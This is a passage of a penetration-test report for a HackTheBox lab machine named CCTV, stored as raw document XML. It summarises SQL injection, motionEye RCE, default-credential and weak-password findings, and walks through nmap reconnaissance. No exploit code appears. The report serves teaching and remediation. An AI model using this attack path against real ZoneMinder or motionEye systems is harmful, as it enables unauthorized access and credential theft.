                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Documented all findings with screenshots, severity ratings, and remediation steps.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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c8d" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">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4.  HIGH-LEVEL FINDINGS</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:after="14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All four findings are summarised below, ordered from most critical to least critical:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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2300"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1220"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2600"/>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="2300"/>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="12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78">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79">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7A">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7B">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Affected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7C">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D">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (CVE-2024-51482)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E">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c0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7F">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">All user passwords stolen from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0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ZoneMinder v1.37.63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1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Update ZoneMinder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2">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE in motionEye (CVE-2025-60787)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3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>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4">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Full root shell — complete system takeover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5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">motionEye (root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086">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch + drop root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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Default Credentials (admin:admin)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8">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a1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9">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthorized admin login to ZoneMinder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A">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ZoneMinder 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B">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Change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C">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Password — Hash Cracked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D">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a1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E">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH access as mark — user flag captured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8F">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User account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090">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Strong passwords</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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92">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5.  DETAILED FINDINGS</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:spacing w:after="14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Each finding includes a severity rating with a clear explanation of why it received that rating, inline evidence screenshots at each step, and remediation guidance.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="2e75b6" w:space="1" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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5.0  Reconnaissance — Port Scanning</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:after="12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Before any exploitation, the target was scanned using Nmap to discover which network services were running. This is always the first step — you cannot attack what you cannot see.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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098">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nmap -Pn -sVC -p- -T4 --min-rate 5000 10.129.19.244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9A">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9B">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9C">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-Pn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9D">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Skip the host discovery ping and treat the host as online — avoids being stopped by firewalls that block pings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E">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spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sV detects the version of each service (e.g. Apache 2.4.58). -sC runs Nmap's built-in default scripts to gather extra information about each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A0">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A1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scan all 65,535 TCP ports — not just the 1,000 common ones. Ensures nothing is missed on unusual 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3">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sets the scan speed to "aggressive" — faster scan while still being reliable on a stable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A4">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--min-rate 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A5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Forces Nmap to send at least 5,000 packets per second — significantly speeds up the full port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10.129.19.244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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The IP address of the target CCTV machine assigned by HackTheBox</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="21431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 Nmap scan output — two open ports discovered: SSH (22) and HTTP (80)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:spacing w:after="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scan found two open ports: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 22 — SSH (OpenSSH 9.6p1): Secure remote shell access. Used later to log in as mark.</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 80 — HTTP (Apache 2.4.58): A web server redirecting to http://cctv.htb/ — the main target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">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hostname was added to the local hosts file so the browser could resolve cctv.htb:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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0B0">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echo "10.129.19.244  cctv.htb" | sudo tee -a /etc/hosts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B2">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B3">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B4">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echo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B5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Prints the text: the IP address followed by the hostname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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pipes (sends) the output of echo directly into the next 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B8">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sudo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B9">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Runs the following command with administrator privileges — needed to edit the hosts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tee -a /etc/hosts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B">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Writes the text into /etc/hosts. The -a flag means append (add to the end) rather than overwrite the file</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="28194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2: SecureVision homepage at http://cctv.htb — the Staff Login button leads to ZoneMinder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:spacing w:after="0" w:before="40" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2428875"/>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3: ZoneMinder login page at http://cctv.htb/zm/?view=login</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Bdr>
          <w:bottom w:color="c55a11" w:space="1" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="110" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c55a11"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 1 — Default Credentials Left Unchanged  ·  HIGH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
